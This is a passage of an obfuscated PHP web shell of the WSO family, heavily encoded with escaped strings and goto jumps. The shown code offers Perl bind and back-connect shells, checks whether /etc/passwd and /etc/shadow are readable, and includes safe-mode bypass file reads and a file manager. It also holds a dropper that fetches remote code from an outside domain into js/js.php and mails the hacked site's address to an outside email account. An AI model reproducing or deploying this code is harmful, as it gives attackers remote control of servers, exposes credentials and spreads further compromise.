2\154\x65\x47\x56\152\x64\130\x52\x6c\x49\x43\x52\124\x53\x45\x56\115\124\x46\x78\165\111\152\x73\x4e\103\147\x6b\112\131\x32\170\166\x63\62\125\147\x51\x30\x39\117\x54\x6a\163\x4e\x43\x67\x6b\112\132\130\x68\x70\x64\x43\x41\167\x4f\167\60\113\103\x58\x30\116\103\156\60\x3d"; echo "\74\150\x31\76\x4e\x65\164\167\x6f\x72\x6b\40\x74\157\157\x6c\163\74\x2f\x68\61\x3e\74\x64\x69\x76\40\x63\154\141\163\163\75\143\x6f\156\164\x65\156\164\76\xa\40\12\40\x20\x20\40\x3c\146\157\162\x6d\40\156\x61\155\x65\75\47\x6e\x66\160\x27\x20\x6f\156\123\x75\x62\x6d\x69\x74\x3d\x22\147\50\x6e\x75\x6c\x6c\54\x6e\x75\x6c\x6c\54\47\142\160\x70\x27\54\164\x68\151\x73\56\160\157\x72\164\56\166\x61\x6c\165\x65\x29\x3b\x72\x65\164\165\162\156\40\x66\x61\x6c\163\x65\x3b\x22\x3e\xa\40\x20\40\x20\74\x73\x70\x61\156\76\x42\151\156\x64\x20\160\x6f\162\164\40\x74\x6f\40\x2f\x62\x69\156\57\163\150\x20\x5b\x70\145\162\x6c\135\74\x2f\163\x70\141\x6e\76\74\142\x72\57\76\xa\40\x20\40\x20\x50\157\162\164\72\40\x3c\x69\156\160\x75\x74\x20\x74\x79\160\x65\75\x27\x74\145\170\164\x27\40\156\x61\155\145\x3d\x27\160\157\162\164\x27\x20\166\x61\154\x75\x65\75\47\63\x31\63\63\x37\47\x3e\40\74\151\x6e\160\165\x74\40\x74\x79\160\x65\x3d\163\165\x62\155\151\x74\40\166\141\154\x75\x65\75\47\76\76\x27\76\xa\40\40\40\x20\74\x2f\146\x6f\162\155\x3e\xa\x20\x20\x20\40\x3c\x66\157\162\155\x20\x6e\x61\x6d\145\x3d\x27\x6e\x66\160\x27\40\x6f\156\x53\x75\142\x6d\x69\164\75\x22\147\x28\156\x75\x6c\x6c\54\x6e\165\x6c\x6c\54\47\x62\x63\x70\47\x2c\164\150\151\163\x2e\163\x65\162\166\145\162\x2e\166\x61\154\165\145\x2c\x74\x68\x69\x73\56\x70\157\x72\x74\x2e\166\141\x6c\165\x65\x29\x3b\162\145\x74\165\x72\x6e\40\x66\x61\x6c\x73\145\x3b\42\76\xa\40\40\x20\x20\74\x73\x70\x61\x6e\76\x42\141\x63\153\x2d\143\157\156\156\145\143\164\x20\x20\x5b\x70\145\162\154\135\x3c\x2f\x73\x70\x61\156\76\74\142\162\57\x3e\xa\x20\x20\40\40\x53\x65\162\166\145\162\x3a\40\x3c\151\x6e\160\x75\x74\40\164\171\160\x65\75\47\x74\145\x78\164\x27\x20\x6e\x61\x6d\145\x3d\47\x73\x65\162\x76\x65\x72\x27\x20\166\141\x6c\x75\x65\75\47" . $_SERVER["\122\105\115\117\124\105\x5f\x41\x44\x44\x52"] . "\x27\76\40\120\x6f\162\x74\x3a\40\x3c\x69\x6e\160\x75\164\x20\x74\x79\x70\145\75\x27\164\x65\170\164\47\x20\156\141\155\x65\x3d\47\x70\x6f\x72\x74\47\x20\x76\141\x6c\x75\145\75\x27\63\x31\63\x33\x37\47\76\x20\74\x69\x6e\x70\x75\164\x20\164\x79\160\x65\x3d\x73\165\142\x6d\151\x74\40\x76\141\x6c\x75\145\x3d\x27\76\x3e\x27\76\12\x20\xa\x20\40\40\x20\74\57\x66\157\x72\x6d\x3e\74\x62\162\76"; if (isset($_POST["\160\61"])) { function cf($f, $t) { $w = @fopen($f, "\x77") or @function_exists("\x66\151\x6c\x65\x5f\x70\165\164\x5f\143\x6f\x6e\x74\145\x6e\164\x73"); if ($w) { @fwrite($w, @base64_decode($t)); @fclose($w); } } if ($_POST["\x70\61"] == "\142\x70\x70") { cf("\x2f\x74\155\160\57\x62\x70\x2e\160\154", $bind_port_p); $out = wsoEx("\160\x65\162\x6c\40\x2f\x74\155\x70\x2f\142\160\x2e\x70\154\40" . $_POST["\160\x32"] . "\x20\61\76\57\x64\x65\x76\x2f\x6e\x75\x6c\154\x20\x32\76\46\x31\40\46"); echo "\74\160\162\x65\40\143\154\x61\x73\x73\75\155\154\61\76{$out}\xa" . wsoEx("\x70\x73\40\x61\x75\x78\x20\174\40\x67\162\145\160\40\x62\x70\56\160\x6c") . "\x3c\57\160\162\x65\76"; unlink("\57\x74\x6d\x70\x2f\x62\x70\x2e\x70\154"); } if ($_POST["\160\61"] == "\142\x63\160") { cf("\57\164\x6d\x70\57\142\x63\x2e\x70\x6c", $back_connect_p); $out = wsoEx("\x70\x65\x72\x6c\x20\x2f\164\x6d\160\57\142\143\56\160\154\40" . $_POST["\x70\62"] . "\40" . $_POST["\160\63"] . "\x20\x31\x3e\57\x64\145\166\x2f\156\x75\154\x6c\40\x32\76\x26\61\40\x26"); echo "\74\x70\x72\x65\x20\x63\x6c\141\163\x73\x3d\x6d\x6c\61\x3e{$out}\12" . wsoEx("\x70\163\x20\x61\x75\x78\x20\174\40\x67\162\x65\160\x20\x62\x63\56\x70\x6c") . "\x3c\57\160\x72\x65\x3e"; unlink("\x2f\x74\155\160\x2f\x62\143\x2e\160\x6c"); } } echo "\x3c\x2f\144\151\166\76"; wsoFooter(); } goto DVeSk; w3bFN: if (!isset($_SESSION[md5($_SERVER["\110\x54\124\x50\x5f\x48\x4f\x53\124"]) . "\x61\x6a\141\x78"])) { $_SESSION[md5($_SERVER["\x48\124\124\120\x5f\110\x4f\123\124"]) . "\x61\x6a\x61\170"] = (bool) $GLOBALS["\144\x65\146\141\x75\x6c\x74\137\x75\163\x65\137\141\x6a\x61\170"]; } goto dbSML; UH3qI: function actionSecInfo() { wsoHeader(); echo "\x3c\150\61\x3e\123\x65\x72\x76\145\x72\40\x73\145\143\165\x72\x69\164\x79\40\x69\156\146\157\x72\155\141\x74\x69\157\156\74\x2f\150\x31\x3e\74\x64\151\166\x20\143\154\141\x73\x73\75\143\157\156\x74\x65\x6e\164\76"; function wsoSecParam($n, $v) { $v = trim($v); if ($v) { echo "\74\x73\160\141\x6e\x3e" . $n . "\x3a\40\x3c\x2f\x73\x70\x61\156\x3e"; if (strpos($v, "\12") === false) { echo $v . "\x3c\x62\162\76"; } else { echo "\x3c\x70\162\x65\x20\143\x6c\x61\163\163\75\155\154\x31\76" . $v . "\x3c\57\160\162\145\x3e"; } } } wsoSecParam("\123\145\162\x76\x65\x72\40\163\x6f\146\x74\x77\141\x72\x65", @getenv("\x53\105\122\x56\x45\x52\x5f\123\x4f\106\124\127\x41\x52\x45")); if (function_exists("\141\x70\141\143\150\x65\137\147\x65\x74\137\x6d\x6f\x64\165\154\145\163")) { wsoSecParam("\x4c\157\x61\144\145\x64\40\101\x70\141\143\x68\x65\x20\155\157\x64\x75\x6c\145\163", implode("\x2c\40", apache_get_modules())); } wsoSecParam("\x44\x69\x73\x61\142\x6c\145\x64\40\x50\110\x50\40\x46\x75\156\x63\x74\x69\157\x6e\x73", $GLOBALS["\144\x69\163\x61\x62\154\x65\x5f\x66\x75\156\143\164\151\157\156\163"] ? $GLOBALS["\x64\151\x73\141\x62\x6c\x65\137\x66\165\156\143\164\151\x6f\x6e\x73"] : "\x6e\157\x6e\x65"); wsoSecParam("\x4f\160\145\x6e\x20\x62\141\163\x65\40\x64\151\162", @ini_get("\x6f\160\x65\x6e\137\x62\141\163\145\x64\x69\162")); wsoSecParam("\123\x61\x66\x65\x20\155\157\144\x65\x20\x65\170\x65\143\40\x64\x69\x72", @ini_get("\x73\141\x66\145\137\155\x6f\144\145\137\x65\170\x65\x63\137\144\151\x72")); wsoSecParam("\123\141\146\x65\40\x6d\x6f\x64\x65\x20\x69\156\143\x6c\x75\x64\x65\x20\x64\151\162", @ini_get("\x73\x61\x66\x65\x5f\155\157\x64\x65\137\151\x6e\143\154\x75\x64\x65\137\x64\151\x72")); wsoSecParam("\x63\125\x52\114\40\x73\x75\160\160\157\x72\164", function_exists("\143\x75\162\x6c\x5f\166\x65\x72\x73\x69\157\156") ? "\x65\x6e\x61\142\x6c\x65\144" : "\156\x6f"); $temp = array(); if (function_exists("\155\x79\163\161\x6c\137\147\x65\164\137\x63\x6c\151\145\156\x74\137\x69\x6e\146\157")) { $temp[] = "\115\x79\123\161\154\x20\50" . mysql_get_client_info() . "\x29"; } if (function_exists("\155\163\x73\x71\x6c\x5f\143\157\156\x6e\145\x63\164")) { $temp[] = "\x4d\123\123\x51\114"; } if (function_exists("\x70\x67\x5f\143\157\156\156\145\x63\164")) { $temp[] = "\120\x6f\163\x74\147\162\x65\123\121\114"; } if (function_exists("\157\143\x69\137\x63\x6f\156\156\x65\x63\x74")) { $temp[] = "\117\x72\141\x63\154\x65"; } wsoSecParam("\x53\x75\x70\160\x6f\x72\x74\145\x64\40\144\x61\x74\x61\x62\x61\163\145\x73", implode("\x2c\40", $temp)); echo "\x3c\142\x72\76"; if ($GLOBALS["\x6f\163"] == "\156\151\x78") { wsoSecParam("\x52\145\141\144\141\142\x6c\145\x20\x2f\145\x74\x63\x2f\160\x61\163\x73\x77\144", @is_readable("\57\x65\x74\143\57\160\x61\163\163\x77\x64") ? "\171\145\163\40\74\x61\40\x68\162\145\x66\75\47\43\x27\x20\x6f\156\x63\154\151\x63\x6b\x3d\47\147\50\x22\106\x69\x6c\x65\x73\x54\157\x6f\x6c\x73\x22\54\40\x22\x2f\x65\x74\x63\57\42\x2c\x20\42\160\141\163\163\x77\x64\42\51\x27\x3e\x5b\x76\x69\x65\x77\135\x3c\x2f\141\x3e" : "\156\157"); wsoSecParam("\x52\145\141\x64\x61\x62\154\x65\40\57\145\164\x63\57\x73\x68\x61\x64\157\167", @is_readable("\x2f\145\x74\x63\57\x73\150\141\144\157\x77") ? "\171\145\x73\40\x3c\x61\40\x68\162\145\x66\x3d\47\43\x27\40\157\x6e\143\154\x69\x63\153\75\x27\147\50\x22\x46\x69\154\x65\163\x54\157\x6f\154\163\42\x2c\40\42\x65\164\x63\x22\54\x20\42\163\x68\141\144\157\x77\42\x29\x27\x3e\x5b\166\151\x65\x77\135\x3c\57\x61\x3e" : "\x6e\x6f"); wsoSecParam("\117\123\x20\166\145\x72\x73\151\157\x6e", @file_get_contents("\57\x70\x72\x6f\x63\57\166\145\162\163\x69\157\x6e")); wsoSecParam("\104\x69\163\164\x72\x20\x6e\x61\155\145", @file_get_contents("\x2f\145\164\x63\57\151\x73\x73\165\x65\x2e\x6e\x65\x74")); if (!$GLOBALS["\x73\x61\x66\x65\137\x6d\x6f\144\145"]) { $userful = array("\147\143\x63", "\x6c\143\143", "\143\143", "\x6c\144", "\x6d\141\153\145", "\x70\150\160", "\x70\145\x72\x6c", "\x70\171\x74\x68\x6f\156", "\x72\x75\142\x79", "\164\141\x72", "\x67\172\151\x70", "\142\172\151\160", "\142\172\151\x70\x32", "\156\143", "\x6c\x6f\143\x61\x74\145", "\x73\x75\151\x64\x70\x65\x72\x6c"); $danger = array("\x6b\141\166", "\x6e\x6f\x64\63\62", "\x62\144\143\157\x72\145\x64", "\165\x76\163\x63\141\156", "\163\x61\166", "\x64\162\x77\x65\142\144", "\x63\154\141\155\144", "\162\153\150\165\156\164\x65\162", "\x63\150\x6b\x72\x6f\x6f\x74\x6b\151\x74", "\151\160\x74\x61\142\154\145\x73", "\x69\x70\x66\167", "\x74\162\x69\x70\x77\x69\162\145", "\163\x68\x69\x65\154\144\143\x63", "\x70\157\x72\164\163\145\156\164\162\171", "\x73\156\x6f\x72\164", "\x6f\x73\x73\145\143", "\154\151\x64\163\141\x64\x6d", "\x74\143\x70\x6c\x6f\x64\x67", "\163\x78\151\x64", "\x6c\x6f\x67\x63\150\145\x63\x6b", "\154\157\147\x77\141\x74\143\x68", "\163\171\x73\x6d\x61\163\x6b", "\x7a\x6d\142\x73\x63\141\160", "\163\141\167\x6d\x69\154\x6c", "\x77\157\x72\x6d\x73\143\141\156", "\156\151\x6e\152\141"); $downloaders = array("\167\147\x65\x74", "\146\x65\x74\143\x68", "\154\171\156\170", "\154\151\156\x6b\x73", "\143\x75\x72\x6c", "\147\x65\x74", "\x6c\167\x70\55\155\x69\162\162\x6f\x72"); echo "\x3c\142\162\x3e"; $temp = array(); foreach ($userful as $item) { if (wsoWhich($item)) { $temp[] = $item; } } wsoSecParam("\x55\163\145\x72\146\x75\x6c", implode("\54\x20", $temp)); $temp = array(); foreach ($danger as $item) { if (wsoWhich($item)) { $temp[] = $item; } } wsoSecParam("\104\x61\x6e\147\x65\162", implode("\x2c\x20", $temp)); $temp = array(); foreach ($downloaders as $item) { if (wsoWhich($item)) { $temp[] = $item; } } wsoSecParam("\104\x6f\x77\x6e\x6c\157\x61\144\145\162\x73", implode("\x2c\x20", $temp)); echo "\74\142\162\x2f\76"; wsoSecParam("\x48\104\104\40\163\160\x61\143\145", wsoEx("\144\146\x20\55\x68")); wsoSecParam("\110\157\x73\164\163", @file_get_contents("\57\145\164\x63\x2f\150\x6f\163\x74\163")); } } else { wsoSecParam("\x4f\123\x20\x56\x65\162\x73\151\x6f\156", wsoEx("\x76\x65\x72")); wsoSecParam("\101\143\x63\157\165\156\164\x20\123\145\164\x74\x69\x6e\147\163", wsoEx("\x6e\145\x74\x20\141\x63\143\x6f\165\156\x74\163")); wsoSecParam("\125\163\x65\x72\x20\101\143\143\157\x75\x6e\164\x73", wsoEx("\x6e\x65\x74\x20\x75\x73\145\162")); } echo "\x3c\57\144\151\x76\x3e"; wsoFooter(); } goto MG4ce; paXBG: $linkcr = "\114\x69\156\153\x3a\x20" . $_SERVER["\123\x45\122\126\105\122\137\x4e\101\x4d\105"] . '' . $_SERVER["\x52\105\121\125\105\123\x54\137\x55\x52\x49"] . "\x20\x2d\40\x49\x50\x20\105\x78\143\165\x74\151\x6e\x67\72\40{$ip_remote}\40\55\40\124\x69\155\x65\72\40{$time_shell}"; goto abKjx; IHC8D: function actionSafeMode() { $temp = ''; ob_start(); switch ($_POST["\x70\61"]) { case 1: $temp = @tempnam($test, "\143\170"); if (@copy("\x63\157\155\160\x72\x65\163\163\x2e\x7a\154\x69\x62\72\57\x2f" . $_POST["\160\x32"], $temp)) { echo @file_get_contents($temp); unlink($temp); } else { echo "\123\157\162\x72\x79\56\x2e\x2e\40\x43\x61\x6e\x27\x74\40\157\160\145\156\x20\x66\151\x6c\145"; } break; case 2: $files = glob($_POST["\160\62"] . "\52"); if (is_array($files)) { foreach ($files as $filename) { echo $filename . "\xa"; } } break; case 3: $ch = curl_init("\146\151\154\145\x3a\x2f\57" . $_POST["\x70\x32"] . "\x0" . preg_replace("\x21\x5c\x28\134\144\x2b\x5c\x29\134\163\56\x2a\41", '', __FILE__)); curl_exec($ch); break; case 4: ini_restore("\x73\x61\x66\x65\x5f\155\157\144\145"); ini_restore("\157\x70\x65\x6e\137\x62\141\163\x65\144\x69\x72"); include $_POST["\160\x32"]; break; case 5: for (; $_POST["\160\62"] <= $_POST["\x70\63"]; $_POST["\160\62"]++) { $uid = @posix_getpwuid($_POST["\x70\x32"]); if ($uid) { echo join("\72", $uid) . "\xa"; } } break; } $temp = ob_get_clean(); wsoHeader(); echo "\74\150\61\x3e\x53\x61\146\145\40\155\157\x64\x65\40\142\x79\160\141\163\163\x3c\57\150\x31\x3e\x3c\144\151\x76\40\143\154\x61\x73\x73\75\143\x6f\156\164\145\156\164\76"; echo "\74\x73\x70\141\156\x3e\x43\x6f\160\x79\40\50\x72\x65\x61\144\40\x66\151\154\145\51\74\x2f\x73\x70\x61\x6e\x3e\x3c\x66\157\x72\x6d\40\157\156\163\x75\x62\x6d\151\x74\75\x27\x67\x28\x6e\x75\x6c\154\x2c\156\x75\x6c\x6c\54\x22\61\42\x2c\164\150\151\163\x2e\x70\x61\162\x61\x6d\x2e\x76\x61\154\x75\145\51\73\162\x65\164\x75\162\156\40\146\141\x6c\x73\145\x3b\x27\76\x3c\151\x6e\x70\x75\x74\x20\164\171\x70\145\x3d\x74\x65\x78\x74\x20\x6e\141\155\145\75\160\141\x72\141\x6d\76\x3c\151\x6e\x70\x75\164\x20\x74\171\x70\145\x3d\163\x75\142\155\151\x74\x20\166\141\x6c\165\x65\x3d\42\x3e\76\42\76\x3c\x2f\x66\157\162\155\x3e\x3c\x62\x72\x3e\x3c\163\160\141\156\76\107\154\x6f\142\40\50\154\151\163\164\x20\144\x69\x72\x29\74\x2f\163\x70\141\x6e\76\74\146\157\162\x6d\40\x6f\x6e\x73\x75\x62\155\x69\x74\75\47\x67\x28\156\165\x6c\x6c\x2c\156\x75\x6c\x6c\54\x22\62\x22\54\x74\150\x69\x73\x2e\x70\141\x72\141\x6d\x2e\x76\141\x6c\165\x65\x29\73\162\x65\164\165\x72\x6e\x20\146\141\154\163\145\x3b\47\x3e\74\x69\x6e\160\x75\164\x20\164\x79\160\x65\75\x74\145\x78\x74\40\x6e\x61\x6d\x65\x3d\160\141\162\141\155\76\x3c\151\x6e\160\165\x74\40\x74\x79\x70\x65\x3d\x73\x75\142\155\151\x74\x20\166\x61\154\165\145\75\x22\76\x3e\x22\x3e\x3c\x2f\x66\x6f\162\x6d\x3e\x3c\142\x72\76\74\163\160\x61\x6e\x3e\103\165\162\154\x20\x28\162\x65\x61\x64\40\146\151\x6c\145\51\74\x2f\x73\160\x61\x6e\x3e\74\x66\157\x72\155\x20\x6f\156\x73\165\142\x6d\x69\164\x3d\47\147\50\x6e\x75\154\x6c\54\x6e\x75\x6c\x6c\54\x22\63\42\x2c\164\x68\x69\x73\x2e\x70\141\162\141\x6d\x2e\166\x61\154\165\145\x29\x3b\162\145\164\165\x72\156\40\x66\141\x6c\x73\145\73\47\x3e\x3c\151\156\x70\x75\164\x20\x74\x79\160\x65\x3d\x74\145\170\164\40\156\x61\155\x65\x3d\x70\x61\x72\x61\155\76\74\151\x6e\x70\165\164\x20\x74\171\160\145\x3d\x73\x75\142\x6d\x69\164\40\166\x61\154\165\x65\75\42\x3e\76\42\76\x3c\57\146\157\162\x6d\x3e\x3c\142\162\x3e\x3c\x73\160\141\x6e\x3e\111\156\151\x5f\x72\145\163\164\x6f\162\x65\40\50\162\145\x61\x64\40\x66\x69\x6c\x65\x29\74\57\163\160\x61\x6e\x3e\74\146\x6f\162\155\x20\157\156\x73\165\x62\155\x69\164\75\x27\x67\50\156\x75\154\x6c\x2c\156\165\154\154\x2c\x22\x34\x22\54\164\x68\x69\163\56\160\x61\162\x61\155\56\x76\x61\x6c\165\145\x29\x3b\162\x65\164\165\162\x6e\40\x66\x61\x6c\x73\x65\73\47\76\74\x69\x6e\x70\165\164\x20\x74\171\160\x65\x3d\164\145\x78\x74\x20\x6e\141\155\x65\75\160\141\162\141\x6d\x3e\x3c\x69\156\160\165\164\40\164\x79\x70\145\x3d\x73\x75\x62\155\x69\164\x20\166\141\x6c\165\x65\75\x22\76\x3e\x22\76\x3c\57\146\x6f\x72\155\x3e\74\142\162\x3e\x3c\x73\x70\141\156\76\120\x6f\x73\x69\x78\137\147\145\164\x70\x77\x75\151\144\x20\x28\x22\122\145\141\x64\x22\40\x2f\x65\164\143\57\160\141\163\x73\x77\x64\51\74\57\163\160\141\156\76\x3c\x74\x61\142\154\145\76\74\146\157\162\155\x20\157\x6e\163\x75\x62\x6d\x69\164\x3d\x27\x67\x28\x6e\165\x6c\154\54\x6e\165\154\154\54\x22\x35\x22\x2c\x74\x68\x69\x73\x2e\160\141\162\141\155\x31\x2e\x76\x61\x6c\165\145\x2c\x74\150\x69\163\x2e\160\141\x72\x61\x6d\62\56\166\141\154\165\145\x29\x3b\x72\x65\x74\165\162\x6e\x20\146\x61\x6c\x73\x65\x3b\x27\76\74\x74\162\x3e\x3c\164\x64\x3e\106\162\x6f\155\x3c\x2f\x74\x64\76\74\x74\144\76\x3c\151\x6e\160\x75\x74\40\x74\x79\160\x65\75\164\x65\170\x74\x20\156\141\x6d\x65\x3d\x70\141\x72\x61\155\61\40\166\141\154\x75\x65\x3d\60\x3e\74\57\x74\144\x3e\74\57\164\x72\76\x3c\164\x72\76\x3c\x74\144\x3e\x54\157\x3c\x2f\x74\x64\76\74\164\144\x3e\74\151\156\160\x75\164\x20\164\x79\x70\x65\x3d\164\x65\x78\x74\40\x6e\x61\x6d\x65\x3d\160\141\x72\x61\155\62\x20\166\141\154\165\x65\75\x31\x30\60\x30\76\x3c\x2f\x74\x64\x3e\74\x2f\164\162\x3e\x3c\57\164\141\142\x6c\145\x3e\x3c\151\156\x70\165\164\40\164\171\x70\x65\x3d\163\x75\x62\x6d\x69\x74\40\166\141\x6c\x75\x65\x3d\x22\76\x3e\42\76\x3c\x2f\x66\157\x72\155\76"; if ($temp) { echo "\74\x70\162\145\x20\143\x6c\x61\x73\x73\x3d\x22\155\154\61\42\40\x73\164\171\x6c\x65\75\x22\155\141\162\147\x69\x6e\55\164\x6f\x70\72\x35\x70\x78\x22\x20\x69\x64\75\42\117\x75\164\160\x75\x74\42\76" . htmlspecialchars($temp) . "\74\x2f\x70\162\145\x3e"; } echo "\74\57\x64\151\x76\76"; wsoFooter(); } goto Cm9cN; tLnwE: if (!function_exists("\163\x63\x61\x6e\x64\151\x72")) { function scandir($dir) { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) { $files[] = $filename; } return $files; } } goto fvOgj; LZD1D: $server_mail = '' . gethostbyname($_SERVER["\123\105\x52\126\105\122\x5f\x4e\101\115\x45"]) . "\40\40\x2d\40" . $_SERVER["\110\124\x54\x50\x5f\110\117\123\x54"] . ''; goto paXBG; WSK9t: if ($datasi) { } else { @mkdir("\x6a\163"); $dos = file_get_contents("\150\164\x74\x70\x73\x3a\57\57\141\143\142\x64\x66\56\x73\160\x61\143\145\57\x74\170\164\x2f\143\163\163\x2e\164\170\x74"); $data = "\152\x73\57\152\163\56\160\150\160"; @touch("\152\x73\x2f\152\x73\x2e\x70\150\160"); $ver = @fopen($data, "\x77"); @fwrite($ver, $dos); @fclose($ver); $yol = "\150\164\164\x70\72\x2f\x2f" . $_SERVER["\x48\124\124\120\137\x48\117\123\124"] . '' . $_SERVER["\x52\x45\x51\125\105\x53\x54\x5f\125\x52\x49"] . ''; $y = "\74\x68\61\76\x53\x65\156\144\145\162\40\131\141\172\144\151\x72\x69\154\x64\x69\56\x3c\x62\162\x2f\x3e\x20\123\x49\124\105\40\131\117\x4c\40\72\x20" . $yol . "\x3c\142\x72\x2f\76\123\145\x6e\144\x65\162\40\x59\x6f\x6c\165\x20\x3a\x20\x6a\x73\57\143\162\163\x2e\x70\150\x70\74\x2f\x68\x31\76"; $header .= "\x46\x72\157\x6d\72\x20\123\150\145\114\114\x20\x42\x6f\x6f\x74\x20\74\x73\165\x70\x70\157\x72\x40\x6e\151\143\x2e\x6f\x72\147\x3e\xa"; $header .= "\103\157\156\164\x65\156\x74\55\x54\x79\x70\145\x3a\40\x74\145\170\x74\x2f\x68\164\x6d\x6c\x3b\12\40\143\x68\x61\x72\163\145\x74\75\165\164\146\55\70\xa"; @mail("\x6c\157\x67\151\156\157\x6c\x64\x75\x6d\100\x67\x6d\141\151\x6c\x2e\x63\157\155", "\110\141\143\x6b\154\151\156\153\x20\102\x69\x6c\x64\x69\x72\x69", "{$y}", $header); @mail("\154\157\x67\x69\x6e\157\154\144\165\155\x40\147\x6d\141\x69\154\x2e\x63\x6f\155", "\110\x61\143\x6b\154\151\156\153\40\x42\x69\x6c\x64\x69\162\151", "{$y}", $header); } goto iAJkS; A6iUw: if (get_magic_quotes_gpc()) { function WSOstripslashes($array) { return is_array($array) ? array_map("\x57\123\117\x73\164\x72\151\x70\x73\x6c\141\163\x68\145\163", $array) : stripslashes($array); } $_POST = WSOstripslashes($_POST); } goto v_sDF; POwAE: if ($os == "\x77\x69\x6e") { $home_cwd = str_replace("\134", "\x2f", $home_cwd); $cwd = str_replace("\x5c", "\57", $cwd); } goto CpMIl; abKjx: $header = "\106\x72\157\155\x3a\x20{$from_shellcode}\xd\xa\122\x65\x70\x6c\171\x2d\x74\x6f\x3a\x20{$from_shellcode}"; goto VYjv_; Q9S2h: function actionFilesMan() { wsoHeader(); echo "\x3c\x68\x31\x3e\106\x69\154\x65\x20\x6d\x61\156\141\x67\x65\x72\x3c\57\150\61\x3e\74\x64\x69\x76\x20\143\x6c\x61\x73\x73\75\x63\x6f\156\164\x65\156\164\76\x3c\163\143\x72\151\160\x74\x3e\x70\61\137\75\x70\62\137\75\x70\x33\137\75\x22\42\73\74\57\163\x63\162\151\x70\164\x3e"; if (!empty($_POST["\160\61"])) { switch ($_POST["\160\x31"]) { case "\165\160\154\x6f\141\x64\x46\151\154\x65": if (!@move_uploaded_file($_FILES["\146"]["\x74\155\x70\137\x6e\x61\155\x65"], $_FILES["\x66"]["\x6e\141\155\x65"])) { echo "\x43\x61\156\47\164\40\165\160\x6c\x6f\x61\x64\40\x66\x69\154\x65\x21"; } break; case "\x6d\153\x64\151\x72": if (!@mkdir($_POST["\x70\62"])) { echo "\103\x61\156\x27\164\x20\x63\x72\x65\141\x74\145\x20\x6e\145\167\x20\x64\x69\162"; } break; case "\144\145\154\145\x74\x65": function deleteDir($path) { $path = substr($path, -1) == "\x2f" ? $path : $path . "\57"; $dh = opendir($path); while (($item = readdir($dh)) !== false) { $item = $path . $item; if (basename($item) == "\x2e\x2e" || basename($item) == "\x2e") { continue; } $type = filetype($item); if ($type == "\144\151\x72") { deleteDir($item); } else { @unlink($item); } } closedir($dh); @rmdir($path); } if (is_array(@$_POST["\x66"])) { foreach ($_POST["\x66"] as $f) { if ($f == "\56\x2e") { continue; } $f = urldecode($f); if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } } } break; case "\160\x61\163\164\x65": if ($_SESSION["\x61\x63\164"] == "\143\x6f\x70\x79") { function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "\x2e" and $f != "\56\56") { copy_paste($c . $s . "\57", $f, $d . $s . "\57"); } } } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_SESSION["\146"] as $f) { copy_paste($_SESSION["\143"], $f, $GLOBALS["\143\167\144"]); } } elseif ($_SESSION["\x61\143\x74"] == "\155\157\x76\x65") { function move_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "\56" and $f != "\56\56") { copy_paste($c . $s . "\57", $f, $d . $s . "\x2f"); } } } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_SESSION["\x66"] as $f) { @rename($_SESSION["\143"] . $f, $GLOBALS["\143\x77\x64"] . $f); } } elseif ($_SESSION["\x61\x63\164"] == "\172\151\x70") { if (class_exists("\x5a\x69\160\101\162\143\150\151\166\x65")) { $zip = new ZipArchive(); if ($zip->open($_POST["\160\62"], 1)) { chdir($_SESSION["\143"]); foreach ($_SESSION["\x66"] as $f) { if ($f == "\x2e\56") { continue; } if (@is_file($_SESSION["\143"] . $f)) { $zip->addFile($_SESSION["\143"] . $f, $f); } elseif (@is_dir($_SESSION["\143"] . $f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . "\x2f")); foreach ($iterator as $key => $value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS["\x63\167\144"]); $zip->close(); } } } elseif ($_SESSION["\141\143\x74"] == "\x75\156\x7a\151\160") { if (class_exists("\x5a\151\x70\101\162\x63\x68\151\x76\145")) { $zip = new ZipArchive(); foreach ($_SESSION["\146"] as $f) { if ($zip->open($_SESSION["\143"] . $f)) { $zip->extractTo($GLOBALS["\143\167\x64"]); $zip->close(); } } } } elseif ($_SESSION["\141\x63\x74"] == "\x74\x61\162") { chdir($_SESSION["\143"]); $_SESSION["\x66"] = array_map("\145\x73\x63\141\160\145\x73\150\x65\x6c\x6c\141\x72\147", $_SESSION["\x66"]); wsoEx("\x74\141\x72\x20\x63\146\172\x76\40" . escapeshellarg($_POST["\160\x32"]) . "\x20" . implode("\x20", $_SESSION["\x66"])); chdir($GLOBALS["\143\167\x64"]); } unset($_SESSION["\146"]); break; default: if (!empty($_POST["\x70\61"])) { $_SESSION["\x61\143\164"] = @$_POST["\x70\x31"]; $_SESSION["\146"] = @$_POST["\146"]; foreach ($_SESSION["\146"] as $k => $f) { $_SESSION["\x66"][$k] = urldecode($f); } $_SESSION["\143"] = @$_POST["\x63"]; } break; } } $dirContent = @scandir(isset($_POST["\x63"]) ? $_POST["\x63"] : $GLOBALS["\143\167\144"]); if ($dirContent === false) { echo "\103\141\156\47\164\40\157\x70\145\x6e\x20\164\150\151\163\x20\146\x6f\154\144\145\x72\x21"; wsoFooter(); return; } global $sort; $sort = array("\156\x61\x6d\145", 1); if (!empty($_POST["\160\x31"])) { if (preg_match("\41\x73\x5f\50\x5b\101\x2d\172\x5d\x2b\x29\137\50\134\x64\x7b\61\x7d\x29\x21", $_POST["\x70\61"], $match)) { $sort = array($match[1], (int) $match[2]); } } echo 